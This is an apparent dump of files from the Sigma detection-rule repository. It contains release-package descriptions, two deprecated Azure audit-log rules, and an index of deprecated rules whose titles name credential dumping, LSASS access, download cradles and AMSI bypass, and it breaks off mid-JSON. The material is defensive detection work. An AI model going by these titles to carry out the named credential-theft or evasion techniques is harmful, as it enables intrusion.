* [Thomas Patzke (@blubbfiction)](https://twitter.com/blubbfiction)
## Credits
This project would've never reached this height without the help of the hundreds of contributors. Thanks to all past and present contributors for their help.
## Licenses
The content of this repository is released under the [Detection Rule License (DRL) 1.1](https://github.com/SigmaHQ/Detection-Rule-License).
================================================
FILE: Releases.md
================================================
This following document describes the different types of rule packages provided with every release.
## Package Introduction
The rule packages provided with every release are split based on the [status](https://github.com/SigmaHQ/sigma-specification/blob/main/Sigma_specification.md#status-optional), [level](https://github.com/SigmaHQ/sigma-specification/blob/main/Sigma_specification.md#level) and [type](https://medium.com/sigma-hq/sigma-rule-repository-enhancements-new-folder-structure-rule-types-30adb70f5e10) of a sigma rule.
There are currently 3 main rule types provided in the sigma repository:
- **core/generic**: Rules that match on attacker techniques. These rules are timeless and often match on new threats.
- **emerging-threats/ET**: Rules that match on patterns of specific threat actors or exploits. High signal to noise ratio but will decrease in relevance over time.
- **threat-hunting/TH**: Rules that should not be run for alerting but are interesting in giving detection ideas or hunt for suspicious activity inside an environment.
### Package Overview
name | status | level | type
--- | --- | --- | ---
[Core (Default)](#core-rules) | testing, stable | high, critical | core
[Core+ (Rule Review needed)](#core-rules-1) | testing, stable | medium, high, critical | core
[Core++ (Experimental)](#core-rules-2) | experimental, testing, stable | medium, high, critical | core
[Emerging Threats AddOn Rules](#et-emerging-threats-addon-rules) | experimental, testing, stable | medium, high, critical | emerging threats
[All rules](#all-rules) | experimental, testing, stable | medium, high, critical | core, emerging threats
If you are new, best start with the `Core` Sigma package. It includes high quality rules of high confidence and relevance and should not produce many false positives.
If your setup is working fine, you can add the `emerging threats` rules and start thinking about upgrading to `Core+` rules. If that is not enough and you like the pain, use the "all" rules package.
### Defined Package
#### Core Rules
The `Core` Sigma package includes high quality rules of high confidence and relevance and should not produce many false positives.
The selected rules are of level `high` or `critical`, which means matches are of high or critical importance. The rule status is `testing` or `stable`, which means the rule is at least of an age of half a year and no false positives were reported on it.
The type is `core`, meaning the rules will match on attacker technique and generic suspicious or malicious behavior.
#### Core+ Rules
The plus in the `Core+` Sigma package stands for the addition of `medium` level rules. Those rules most often need additional tuning as certain applications, legitimate user behavior or scripts of an organization might be matched. Not every `medium` level rule is useful in every organization.
#### Core++ Rules
The `Core++` package additionally includes the rules of `experimental` status. These rules are bleeding edge. They are validated against the Goodlog tests available to the SigmaHQ project and reviewed by multiple detection engineers. Other than that they are pretty much untested at first. Use these if you want to be able to detect threats as early as possible at the cost of managing a higher threshold of false positives.
Please report any false positives you find in the wild via our [github issue tracker](https://github.com/SigmaHQ/sigma/issues/new?assignees=&labels=False-Positive&projects=&template=false_positive_report.yml). After a grace period all `experimental` rules will eventually be promoted to status `test`.
### Package AddOn's
#### ET (Emerging Threats) AddOn Rules
The `ET AddOn` Sigma package contains all of the `emerging threats` rules. These rules have a low false positive rate so that it already contains rules of status `experimental`. These rules target specific threats and are especially useful for current threats where maybe not much information is yet available. So we want to get them to you as fast as possible. The package is an `AddOn` so you can use it on top of whichever `Core` package is most useful to you.
### All Rules
> **Note**
>
> This package doesn't contain all rules
This package includes all rules from level `medium` with a status of `experimental` and upwards including the `emerging threats` rules. Some heavy tuning is required when using this package.
You'll notice that rules of level `low` and some other are omitted even from this the `All Rules` package. We do not recommend using any other types of rules to generate alerts except for those provided in these packages.
### Create Your Own Custom Rule Package
Releases are tagged using the format `r` (e.g. `r2023-12-24`).
You can checkout any release version and create your own package using the [sigma-package-release](tests/sigma-package-release.py) script. Define the `status`, `level` and `type` of rules and the script generates a ZIP archive containing only those rules.
e.g.
```bash
# python3 tests/sigma-package-release.py --min-status testing --levels high critical --types generic --outfile Sigma-custom.zip
```
You can either give `level` and `status` as a space separated list or using a minimum value. See `--help` for all options
================================================
FILE: deprecated/README.md
================================================
# Deprecated folder
This folder contains all rules that have been marked as deprecated.
It is recommended to avoid using these rules, as they are no longer maintained or supported.
For a summary of the deprecated rules, refer to [deprecated.csv](./deprecated.csv) or [deprecated.json](./deprecated.json)
# references
https://github.com/SigmaHQ/sigma-specification/blob/main/specification/sigma-rules-specification.md#status
================================================
FILE: deprecated/cloud/azure_app_credential_modification.yml
================================================
title: Azure Application Credential Modified
id: cdeef967-f9a1-4375-90ee-6978c5f23974
status: deprecated
description: Identifies when a application credential is modified.
references:
- https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/
author: Austin Songer @austinsonger
date: 2021-09-02
modified: 2025-10-17
tags:
- attack.impact
logsource:
product: azure
service: activitylogs
detection:
selection:
properties.message: 'Update application – Certificates and secrets management'
condition: selection
falsepositives:
- Application credential added may be performed by a system administrator.
- Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
- Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
level: medium
================================================
FILE: deprecated/cloud/azure_app_permissions_for_api.yml
================================================
title: App Permissions Granted For Other APIs
id: ba2a7c80-027b-460f-92e2-57d113897dbc
status: deprecated
description: Detects when app permissions (app roles) for other APIs are granted
references:
- https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions
author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'
date: 2022/07/28
modified: 2023/03/29
tags:
- attack.privilege_escalation
logsource:
product: azure
service: auditlogs
detection:
selection:
properties.message: Add app role assignment to service principal
condition: selection
falsepositives:
- When the permission is legitimately needed for the app
level: medium
================================================
FILE: deprecated/deprecated.csv
================================================
id,title,date,modified,level
867613fb-fa60-4497-a017-a82df74a172c,PowerShell Execution,2019-09-12,2021-11-05,medium
0d894093-71bc-43c3-8c4d-ecfc28dcf5d9,Mimikatz Detection LSASS Access,2017-10-18,2022-04-11,high
3d304fda-78aa-43ed-975c-d740798a49c1,Suspicious PowerShell Invocations - Generic,2017-03-12,2022-04-11,high
56a8189f-11b2-48c8-8ca7-c54b03c2fbf7,Suspicious Esentutl Use,2020-05-23,2022-04-11,high
65531a81-a694-4e31-ae04-f8ba5bc33759,Suspicious PowerShell Download,2017-03-05,2022-04-11,medium
9f7aa113-9da6-4a8d-907c-5f1a4b908299,SyncAppvPublishingServer Execution to Bypass Powershell Restriction,2020-10-05,2022-04-11,medium
a0d63692-a531-4912-ad39-4393325b2a9c,RClone Execution,2021-05-10,2022-04-11,high
b932b60f-fdda-4d53-8eda-a170c1d97bbd,Activity Related to NTDS.dit Domain Hash Retrieval,2019-01-16,2022-04-11,high
cb7286ba-f207-44ab-b9e6-760d82b84253,Rclone Execution via Command Line or PowerShell,2021-05-26,2022-04-11,high
fde7929d-8beb-4a4c-b922-be9974671667,SyncAppvPublishingServer Execution to Bypass Powershell Restriction,2020-10-05,2022-04-11,medium
17f878b8-9968-4578-b814-c4217fc5768c,Autorun Keys Modification,2019-10-25,2022-05-14,medium
29d31aee-30f4-4006-85a9-a4a02d65306c,Lateral Movement Indicator ConDrv,2021-04-27,2022-05-14,low
98f4c75c-3089-44f3-b733-b327b9cd9c9d,Accessing Encrypted Credentials from Google Chrome Login Database,2021-12-20,2022-05-14,medium
a457f232-7df9-491d-898f-b5aabd2cbe2f,Windows Management Instrumentation DLL Loaded Via Microsoft Word,2019-12-26,2022-05-14,informational
db2110f3-479d-42a6-94fb-d35bc1e46492,CreateMiniDump Hacktool,2019-12-22,2022-05-14,high
2621b3a6-3840-4810-ac14-a02426086171,Winword.exe Loads Suspicious DLL,2020-10-09,2022-07-25,medium
bf6c39fc-e203-45b9-9538-05397c1b4f3f,Abusing Findstr for Defense Evasion,2020-10-05,2022-10-12,medium
82a19e3a-2bfe-4a91-8c0d-5d4c98fbb719,Possible Applocker Bypass,2019-01-16,2022-11-03,low
dca91cfd-d7ab-4c66-8da7-ee57d487b35b,Process Start From Suspicious Folder,2022-02-11,2022-11-03,low
53c7cca0-2901-493a-95db-d00d6fcf0a37,Brute Force,2019-10-25,2022-11-04,medium
5f113a8f-8b61-41ca-b90f-d374fa7e4a39,Suspicious In-Memory Module Execution,2019-10-27,2022-11-17,low
f67dbfce-93bc-440d-86ad-a95ae8858c90,Suspicious Bitsadmin Job via PowerShell,2018-10-30,2022-11-21,high
9d1c72f5-43f0-4da5-9320-648cf2099dd0,Excel Proxy Executing Regsvr32 With Payload,2021-08-23,2022-12-02,high
c0e1c3d5-4381-4f18-8145-2583f06a1fe5,Excel Proxy Executing Regsvr32 With Payload Alternate,2021-08-23,2022-12-02,high
72671447-4352-4413-bb91-b85569687135,Nslookup PwSh Download Cradle,2022-09-06,2022-12-14,medium
3f07b9d1-2082-4c56-9277-613a621983cc,Accessing WinAPI in PowerShell for Credentials Dumping,2020-10-06,2022-12-18,high
e554f142-5cf3-4e55-ace9-a1b59e0def65,DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon,2020-10-12,2022-12-18,critical
17eb8e57-9983-420d-ad8a-2c4976c22eb8,MavInject Process Injection,2018-12-12,2022-12-19,high
36c5146c-d127-4f85-8e21-01bf62355d5a,Invoke-Obfuscation Via Use Rundll32,2019-10-08,2022-12-30,high
6d3f1399-a81c-4409-aff3-1ecfe9330baf,PrintNightmare Powershell Exploitation,2021-08-09,2023-01-02,high
83083ac6-1816-4e76-97d7-59af9a9ae46e,AzureHound PowerShell Commands,2021-10-23,2023-01-02,high
a85cf4e3-56ee-4e79-adeb-789f8fb209a8,Indirect Command Exectuion via Forfiles,2022-10-17,2023-01-04,medium
fa47597e-90e9-41cd-ab72-c3b74cfb0d02,Indirect Command Execution,2019-10-24,2023-01-04,low
e4b63079-6198-405c-abd7-3fe8b0ce3263,Suspicious CLR Logs Creation,2020-10-12,2023-01-05,high
cd5c8085-4070-4e22-908d-a5b3342deb74,Suspicious Bitstransfer via PowerShell,2021-08-19,2023-01-10,medium
d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20,Renamed PowerShell,2019-08-22,2023-01-18,high
d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2,Renamed Rundll32.exe Execution,2022-06-08,2023-01-18,high
e31f89f7-36fb-4697-8ab6-48823708353b,Suspicious Cmd Execution via WMI,2022-09-27,2023-01-19,medium
bf7286e7-c0be-460b-a7e8-5b2e07ecc2f2,Netcat The Powershell Version - PowerShell Module,2021-07-21,2023-01-20,medium
47688f1b-9f51-4656-b013-3cc49a166a36,Base64 Encoded Listing of Shadowcopy,2022-03-01,2023-01-30,high
5b572dcf-254b-425c-a8c5-d9af6bea35a6,Potential Xor Encoded PowerShell Command,2022-07-06,2023-01-30,medium
fd6e2919-3936-40c9-99db-0aa922c356f7,Malicious Base64 Encoded Powershell Invoke Cmdlets,2022-05-31,2023-01-30,high
eeb66bbb-3dde-4582-815a-584aee9fe6d1,Correct Execution of Nltest.exe,2021-10-04,2023-02-02,high
0acaad27-9f02-4136-a243-c357202edd74,Ryuk Ransomware Command Line Activity,2019-08-06,2023-02-03,critical
4f927692-68b5-4267-871b-073c45f4f6fe,PowerShell AMSI Bypass Pattern,2022-11-04,2023-02-03,high
038cd51c-3ad8-41c5-ba8f-5d1c92f3cc1e,Registry Dump of SAM Creds and Secrets,2022-01-05,2023-02-04,high
04f5363a-6bca-42ff-be70-0d28bf629ead,Office Applications Spawning Wmi Cli Alternate,2021-08-23,2023-02-04,high
23daeb52-e6eb-493c-8607-c4f0246cb7d8,New Lolbin Process by Office Applications,2021-08-23,2023-02-04,high
518643ba-7d9c-4fa5-9f37-baed36059f6a,WMI Execution Via Office Process,2021-08-23,2023-02-04,medium
77815820-246c-47b8-9741-e0def3f57308,Domain Trust Discovery,2019-10-23,2023-02-04,medium
4d6c9da1-318b-4edf-bcea-b6c93fa98fd0,Credential Acquisition via Registry Hive Dumping,2022-10-04,2023-02-06,high
6545ce61-a1bd-4119-b9be-fcbee42c0cf3,Execute MSDT.EXE Using Diagcab File,2022-06-09,2023-02-06,high
9841b233-8df8-4ad7-9133-b0b4402a9014,Sysinternals SDelete Registry Keys,2020-05-02,2023-02-07,medium
09af397b-c5eb-4811-b2bb-08b3de464ebf,WMI Reconnaissance List Remote Services,2022-01-01,2023-02-14,medium
7b0666ad-3e38-4e3d-9bab-78b06de85f7b,Renamed PaExec Execution,2019-04-17,2023-02-14,medium
bc3cc333-48b9-467a-9d1f-d44ee594ef48,SCM DLL Sideload,2022-12-01,2023-02-14,medium
e42af9df-d90b-4306-b7fb-05c863847ebd,WMI Remote Command Execution,2022-03-13,2023-02-14,medium
fa4b21c9-0057-4493-b289-2556416ae4d7,Squirrel Lolbin,2019-11-12,2023-02-14,medium
e011a729-98a6-4139-b5c4-bf6f6dd8239a,Suspicious Certutil Command Usage,2019-01-16,2023-02-15,high
034affe8-6170-11ec-844f-0f78aa0c4d66,Mimikatz MemSSP Default Log File Creation,2021-12-20,2023-02-16,critical
7fe71fc9-de3b-432a-8d57-8c809efc10ab,New Service Creation,2019-10-21,2023-02-20,low
056a7ee1-4853-4e67-86a0-3fd9ceed7555,Invoke-Obfuscation RUNDLL LAUNCHER,2020-10-18,2023-02-21,medium
3ede524d-21cc-472d-a3ce-d21b568d8db7,PsExec Service Start,2018-03-13,2023-02-28,low
80167ada-7a12-41ed-b8e9-aa47195c66a1,Run Whoami as SYSTEM,2019-10-23,2023-02-28,high
fa91cc36-24c9-41ce-b3c8-3bbc3f2f67ba,PsExec Tool Execution,2017-06-12,2023-02-28,low
2c0d2d7b-30d6-4d14-9751-7b9113042ab9,Suspicious Characters in CommandLine,2022-04-27,2023-03-03,high
6783aa9e-0dc3-49d4-a94a-8b39c5fd700b,Stop Or Remove Antivirus Service,2021-07-07,2023-03-04,high
7fd4bb39-12d0-45ab-bb36-cebabc73dc7b,Suspicious Execution of Sc to Delete AV Services,2022-08-01,2023-03-04,high
a7a7e0e5-1d57-49df-9c58-9fe5bc0346a2,Renamed PsExec,2019-05-21,2023-03-04,high
1a70042a-6622-4a2b-8958-267625349abf,Run from a Zip File,2021-12-26,2023-03-05,medium
46591fae-7a4c-46ea-aec3-dff5e6d785dc,Root Certificate Installed,2020-10-10,2023-03-05,medium
eb87818d-db5d-49cc-a987-d5da331fbd90,Stop Windows Service,2019-10-23,2023-03-05,low
23250293-eed5-4c39-b57a-841c8933a57d,Visual Basic Script Execution,2022-01-02,2023-03-06,medium
344482e4-a477-436c-aa70-7536d18a48c7,Execution via MSSQL Xp_cmdshell Stored Procedure,2022-09-28,2023-03-06,high
00a4bacd-6db4-46d5-9258-a7d5ebff4003,Read and Execute a File Via Cmd.exe,2022-08-20,2023-03-07,medium
70e68156-6571-427b-a6e9-4476a173a9b6,Cmd Stream Redirection,2022-02-04,2023-03-07,medium
033fe7d6-66d1-4240-ac6b-28908009c71f,APT29,2018-12-04,2023-03-08,high
04d9079e-3905-4b70-ad37-6bdf11304965,CrackMapExecWin,2018-04-08,2023-03-08,critical
18739897-21b1-41da-8ee4-5b786915a676,GALLIUM Artefacts,2020-02-07,2023-03-09,high
0eb2107b-a596-422e-b123-b389d5594ed7,Hurricane Panda Activity,2019-03-04,2023-03-10,high
4a12fa47-c735-4032-a214-6fab5b120670,Lazarus Activity Apr21,2021-04-20,2023-03-10,high
7454df60-1478-484b-810d-bff5d0ba6d4b,DNS Tunnel Technique from MuddyWater,2020-06-04,2023-03-10,critical
7b49c990-4a9a-4e65-ba95-47c9cc448f6e,Lazarus Loaders,2020-12-23,2023-03-10,critical
43f487f0-755f-4c2a-bce7-d6d2eec2fcf8,Suspicious Add Scheduled Task From User AppData Temp,2021-11-03,2023-03-14,high
d813d662-785b-42ca-8b4a-f7457d78d5a9,Suspicious Load of Advapi31.dll,2022-02-03,2023-03-15,informational
e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9,Edit of .bash_profile and .bashrc,2019-05-12,2023-03-23,medium
ba2a7c80-027b-460f-92e2-57d113897dbc,App Permissions Granted For Other APIs,2022-07-28,2023-03-29,medium
18cf6cf0-39b0-4c22-9593-e244bdc9a2d4,TA505 Dropper Load Pattern,2020-12-08,2023-04-05,critical
2d117e49-e626-4c7c-bd1f-c3c0147774c8,Potential PowerShell Base64 Encoded Shellcode,2018-11-17,2023-04-06,medium
635dbb88-67b3-4b41-9ea5-a3af2dd88153,Microsoft Binary Github Communication,2017-08-24,2023-04-18,high
6c939dfa-c710-4e12-a4dd-47e1f10e68e1,Domestic Kitten FurBall Malware Pattern,2021-02-08,2023-04-20,high
6355a919-2e97-4285-a673-74645566340d,Process Memory Dumped Via RdrLeakDiag.EXE,2022-01-04,2023-04-24,high
9cf01b6c-e723-4841-a868-6d7f8245ca6e,Group Modification Logging,2019-03-26,2023-04-26,low
410ad193-a728-4107-bc79-4419789fcbf8,Trickbot Malware Reconnaissance Activity,2019-12-28,2023-04-28,high
fce5f582-cc00-41e1-941a-c6fabf0fdb8c,Suspicious PowerShell Invocations - Specific,2017-03-05,2023-05-04,high
f016c716-754a-467f-a39e-63c06f773987,Suspicious Remote Thread Target,2022-08-25,2023-05-05,medium
65d2be45-8600-4042-b4c0-577a1ff8a60e,Application Whitelisting Bypass via DLL Loaded by odbcconf.exe,2019-10-25,2023-05-22,medium
8e2b24c9-4add-46a0-b4bb-0057b4e6187d,Regsvr32 Anomaly,2019-01-16,2023-05-26,high
fe6e002f-f244-4278-9263-20e4b593827f,Alternate PowerShell Hosts - Image,2019-09-12,2023-06-01,low
9e77ed63-2ecf-4c7b-b09d-640834882028,PsExec Pipes Artifacts,2020-05-10,2023-08-07,medium
39776c99-1c7b-4ba0-b5aa-641525eee1a4,Execution via CL_Mutexverifiers.ps1,2020-10-14,2023-08-17,high
4cd29327-685a-460e-9dac-c3ab96e549dc,Execution via CL_Invocation.ps1 - Powershell,2020-10-14,2023-08-17,high
4e8d5fd3-c959-441f-a941-f73d0cdcdca5,Abusing Windows Telemetry For Persistence - Registry,2020-09-29,2023-08-17,high
7c637634-c95d-4bbf-b26c-a82510874b34,Disable Microsoft Office Security Features,2021-06-08,2023-08-17,high
8a58209c-7ae6-4027-afb0-307a78e4589a,User Account Hidden By Registry,2022-08-20,2023-08-17,high
9b894e57-033f-46cf-b7fa-a52804181973,Office Security Settings Changed,2020-05-22,2023-08-17,high
c81fe886-cac0-4913-a511-2822d72ff505,SilentProcessExit Monitor Registration,2021-02-26,2023-08-17,high
0c1ffcf9-efa9-436e-ab68-23a9496ebf5b,User Added To Admin Group - MacOS,2023-03-19,2023-08-22,medium
5b80cf53-3a46-4adc-960b-05ec19348d74,Wscript Execution from Non C Drive,2022-10-01,2023-08-29,medium
5e3d3601-0662-4af0-b1d2-36a05e90c40a,LSASS Memory Dump File Creation,2019-10-22,2023-08-29,high
839f1ee1-292d-495a-bf37-818267b8ee82,Vulnerable Driver Load By Name,2022-10-03,2023-09-03,low
21b23707-60d6-41bb-96e3-0f0481b0fed9,Vulnerable Dell BIOS Update Driver Load,2021-05-05,2023-09-12,high
7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647,Vulnerable GIGABYTE Driver Load,2022-07-25,2023-09-12,high
7c676970-af4f-43c8-80af-ec9b49952852,Vulnerable AVAST Anti Rootkit Driver Load,2022-07-28,2023-09-12,high
9bacc538-d1b9-4d42-862e-469eafc05a41,Vulnerable HW Driver Load,2022-07-26,2023-09-12,high
ac683a42-877b-4ff8-91ac-69e94b0f70b4,Vulnerable Lenovo Driver Load,2022-11-10,2023-09-12,high
91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6,Usage Of Malicious POORTRY Signed Driver,2022-12-16,2023-09-13,high
d7825193-b70a-48a4-b992-8b5b3015cc11,Windows Update Client LOLBIN,2020-10-17,2023-11-11,high
ca83e9f3-657a-45d0-88d6-c1ac280caf53,New Service Uses Double Ampersand in Path,2022-07-05,2023-11-15,high
fe34868f-6e0e-4882-81f6-c43aa8f15b62,Windows Defender Threat Detection Disabled,2020-07-28,2023-11-22,high
32d0d3e2-e58d-4d41-926b-18b520b2b32d,Credential Dumping Tools Accessing LSASS Memory,2017-02-16,2023-11-30,high
a122ac13-daf8-4175-83a2-72c387be339d,Security Event Log Cleared,2021-08-15,2023-12-06,medium
0332a266-b584-47b4-933d-a00b103e1b37,Suspicious Get-WmiObject,2022-01-12,2023-12-11,low
46deb5e1-28c9-4905-b2df-51cdcc9e6073,PowerShell Scripts Run by a Services,2020-10-06,2023-12-11,high
d23f2ba5-9da0-4463-8908-8ee47f614bb9,Powershell File and Directory Discovery,2021-12-15,2023-12-11,low
df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2,Credential Dumping Tools Service Execution,2017-03-05,2023-12-11,critical
602a1f13-c640-4d73-b053-be9a2fa58b77,Svchost DLL Search Order Hijack,2019-10-28,2024-01-10,high
839dd1e8-eda8-4834-8145-01beeee33acd,SAM Dump to AppData,2018-01-27,2024-01-18,high
e32ce4f5-46c6-4c47-ba69-5de3c9193cd7,Possible Process Hollowing Image Loading,2018-01-07,2024-01-22,high
a6d67db4-6220-436d-8afc-f3842fe05d43,Dnscat Execution,2019-10-24,2024-01-25,critical
d7b09985-95a3-44be-8450-b6eadf49833e,Suspicious Non-Browser Network Communication With Reddit API,2023-02-16,2024-02-02,medium
37325383-740a-403d-b1a2-b2b4ab7992e7,CobaltStrike Malleable (OCSP) Profile,2019-11-12,2024-02-15,high
41b42a36-f62c-4c34-bd40-8cb804a34ad8,CobaltStrike Malformed UAs in Malleable Profiles,2021-05-06,2024-02-15,critical
953b895e-5cc9-454b-b183-7f3db555452e,CobaltStrike Malleable Amazon Browsing Traffic Profile,2019-11-12,2024-02-15,high
c9b33401-cc6a-4cf6-83bb-57ddcb2407fc,CobaltStrike Malleable OneDrive Browsing Traffic Profile,2019-11-12,2024-02-15,high
73fcad2e-ff14-4c38-b11d-4172c8ac86c7,Suspicious Rundll32 Script in CommandLine,2021-12-04,2024-02-23,medium
9f06447a-a33a-4cbe-a94f-a3f43184a7a3,Rundll32 JS RunHTMLApplication Pattern,2022-01-14,2024-02-23,high
e06ac91d-b9e6-443d-8e5b-af749e7aa6b6,iOS Implant URL Pattern,2019-08-30,2024-02-26,critical
628d7a0b-7b84-4466-8552-e6138bc03b43,Suspicious Epmap Connection,2022-07-14,2024-03-01,high
9433ff9c-5d3f-4269-99f8-95fc826ea489,CrackMapExec File Creation Patterns,2022-03-12,2024-03-01,high
c625c4c2-515d-407f-8bb6-456f65955669,Service Binary in Uncommon Folder,2022-05-02,2024-03-25,medium
42f0e038-767e-4b85-9d96-2c6335bad0b5,Adwind RAT / JRAT - Registry,2017-11-10,2024-03-26,high
5039f3d2-406a-4c1a-9350-7a5a85dc84c2,Search-ms and WebDAV Suspicious Indicators in URL,2023-08-21,2024-05-10,high
b916cba1-b38a-42da-9223-17114d846fd6,Potential NT API Stub Patching,2023-01-07,2024-05-27,medium
3d968d17-ffa4-4bc0-bfdc-f139de76ce77,Potential Persistence Via COM Hijacking From Suspicious Locations,2022-07-28,2024-07-16,high
1a3d42dd-3763-46b9-8025-b5f17f340dfb,Suspicious Unattend.xml File Access,2021-12-19,2024-07-22,medium
6902955a-01b7-432c-b32a-6f5f81d8f624,Suspicious File Event With Teams Objects,2022-09-16,2024-07-22,high
a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12,Potential Persistence Via COM Search Order Hijacking,2020-04-14,2024-09-02,medium
a33f8808-2812-4373-ae95-8cfb82134978,Windows Defender Exclusion Deleted,2019-10-26,2025-01-30,medium
e17121b4-ef2a-4418-8a59-12fb1631fa9e,Delete Volume Shadow Copies via WMI with PowerShell - PS Script,2021-12-26,2025-05-20,high
6e897651-f157-4d8f-aaeb-df8151488385,PowerShell Web Download,2022-03-24,2025-07-18,medium
f748c45a-f8d3-4e6f-b617-fe176f695b8f,.RDP File Created by Outlook Process,2024-11-01,2025-07-22,high
a2a3b925-7bb0-433b-b508-db9003263cc4,Active Directory Parsing DLL Loaded Via Office Application,2020-02-19,2025-10-17,medium
cdeef967-f9a1-4375-90ee-6978c5f23974,Azure Application Credential Modified,2021-09-02,2025-10-17,medium
8f70ac5f-1f6f-4f8e-b454-db19561216c5,PowerShell DownloadFile,2020-08-28,2025-10-20,high
e28a5a99-da44-436d-b7a0-2afc20a5f413,Whoami Utility Execution,2018-08-13,2025-10-20,low
7417e29e-c2e7-4cf6-a2e8-767228c64837,Active Directory Kerberos DLL Loaded Via Office Application,2020-02-19,2025-10-22,medium
879c3015-c88b-4782-93d7-07adf92dbcb7,Space After Filename,2020-06-17,2025-11-22,low
e710a880-1f18-4417-b6a0-b5afdf7e305a,Atomic MacOS Stealer - FileGrabber Infostealer Execution,2025-09-12,2025-11-22,high
4be03877-d5b6-4520-85c9-a5911c0a656c,FileFix - Suspicious Child Process from Browser File Upload Abuse,2025-06-26,2025-11-24,high
6e30c82f-a9f8-4aab-b79c-7c12bce6f248,File Download Via Bitsadmin To An Uncommon Target Folder,2022-06-28,2025-12-10,medium
================================================
FILE: deprecated/deprecated.json
================================================
[
{
"id": "867613fb-fa60-4497-a017-a82df74a172c",
"title": "PowerShell Execution",
"date": "2019-09-12",
"modified": "2021-11-05",
"level": "medium"
},
{
"id": "0d894093-71bc-43c3-8c4d-ecfc28dcf5d9",
"title": "Mimikatz Detection LSASS Access",
"date": "2017-10-18",
"modified": "2022-04-11",
"level": "high"
},
{
"id": "3d304fda-78aa-43ed-975c-d740798a49c1",
"title": "Suspicious PowerShell Invocations - Generic",
"date": "2017-03-12",
"modified": "2022-04-11",
"level": "high"
},
{
"id": "56a8189f-11b2-48c8-8ca7-c54b03c2fbf7",
"title": "Suspicious Esentutl Use",
"date": "2020-05-23",
"modified": "2022-04-11",
"level": "high"
},
{
"id": "65531a81-a694-4e31-ae04-f8ba5bc33759",
"title": "Suspicious PowerShell Download",
"date": "2017-03-05",
"modified": "2022-04-11",
"level": "medium"
},
{
"id": "9f7aa113-9da6-4a8d-907c-5f1a4b908299",
"title": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction",
"date": "2020-10-05",
"modified": "2022-04-11",
"level": "medium"
},
{
"id": "a0d63692-a531-4912-ad39-4393325b2a9c",
"title": "RClone Execution",
"date": "2021-05-10",
"modified": "2022-04-11",
"level": "high"
},
{
"id": "b932b60f-fdda-4d53-8eda-a170c1d97bbd",
"title": "Activity Related to NTDS.dit Domain Hash Retrieval",
"date": "2019-01-16",
"modified": "2022-04-11",
"level": "high"
},
{
"id": "cb7286ba-f207-44ab-b9e6-760d82b84253",
"title": "Rclone Execution via Command Line or PowerShell",
"date": "2021-05-26",
"modified": "2022-04-11",
"level": "high"
},
{
"id": "fde7929d-8beb-4a4c-b922-be9974671667",
"title": "SyncAppvPublishingServer Execution to Bypass Powershell Restriction",
"date": "2020-10-05",
"modified": "2022-04-11",
"level": "medium"
},
{
"id": "17f878b8-9968-4578-b814-c4217fc5768c",
"title": "Autorun Keys Modification",
"date": "2019-10-25",
"modified": "2022-05-14",
"level": "medium"
},
{
"id": "29d31aee-30f4-4006-85a9-a4a02d65306c",
"title": "Lateral Movement Indicator ConDrv",
"date": "2021-04-27",
"modified": "2022-05-14",
"level": "low"
},
{
"id": "98f4c75c-3089-44f3-b733-b327b9cd9c9d",
"title": "Accessing Encrypted Credentials from Google Chrome Login Database",
"date": "2021-12-20",
"modified": "2022-05-14",
"level": "medium"
},
{
"id": "a457f232-7df9-491d-898f-b5aabd2cbe2f",
"title": "Windows Management Instrumentation DLL Loaded Via Microsoft Word",
"date": "2019-12-26",
"modified": "2022-05-14",
"level": "informational"
},
{
"id": "db2110f3-479d-42a6-94fb-d35bc1e46492",
"title": "CreateMiniDump Hacktool",
"date": "2019-12-22",
"modified": "2022-05-14",
"level": "high"
},
{
"id": "2621b3a6-3840-4810-ac14-a02426086171",
"title": "Winword.exe Loads Suspicious DLL",
"date": "2020-10-09",
"modified": "2022-07-25",
"level": "medium"
},
{
"id": "bf6c39fc-e203-45b9-9538-05397c1b4f3f",
"title": "Abusing Findstr for Defense Evasion",
"date": "2020-10-05",
"modified": "2022-10-12",
"level": "medium"
},
{
"id": "82a19e3a-2bfe-4a91-8c0d-5d4c98fbb719",
"title": "Possible Applocker Bypass",
"date": "2019-01-16",
"modified": "2022-11-03",
"level": "low"
},
{
"id": "dca91cfd-d7ab-4c66-8da7-ee57d487b35b",
"title": "Process Start From Suspicious Folder",
"date": "2022-02-11",
"modified": "2022-11-03",
"level": "low"
},
{
"id": "53c7cca0-2901-493a-95db-d00d6fcf0a37",
"title": "Brute Force",
"date": "2019-10-25",
"modified": "2022-11-04",
"level": "medium"
},
{
"id": "5f113a8f-8b61-41ca-b90f-d374fa7e4a39",
"title": "Suspicious In-Memory Module Execution",
"date": "2019-10-27",
"modified": "2022-11-17",
"level": "low"
},
{
"id": "f67dbfce-93bc-440d-86ad-a95ae8858c90",
"title": "Suspicious Bitsadmin Job via PowerShell",
"date": "2018-10-30",
"modified": "2022-11-21",
"level": "high"
},
{
"id": "9d1c72f5-43f0-4da5-9320-648cf2099dd0",
"title": "Excel Proxy Executing Regsvr32 With Payload",
"date": "2021-08-23",
"modified": "2022-12-02",
"level": "high"
},
{
"id": "c0e1c3d5-4381-4f18-8145-2583f06a1fe5",
"title": "Excel Proxy Executing Regsvr32 With Payload Alternate",
"date": "2021-08-23",
"modified": "2022-12-02",
"level": "high"
},
{
"id": "72671447-4352-4413-bb91-b85569687135",
"title": "Nslookup PwSh Download Cradle",
"date": "2022-09-06",
"modified": "2022-12-14",
"level": "medium"
},
{
"id": "3f07b9d1-2082-4c56-9277-613a621983cc",
"title": "Accessing WinAPI in PowerShell for Credentials Dumping",
"date": "2020-10-06",
"modified": "2022-12-18",
"level": "high"
},
{
"id": "e554f142-5cf3-4e55-ace9-a1b59e0def65",
"title": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon",
"date": "2020-10-12",
"modified": "2022-12-18",
"level": "critical"
},
{
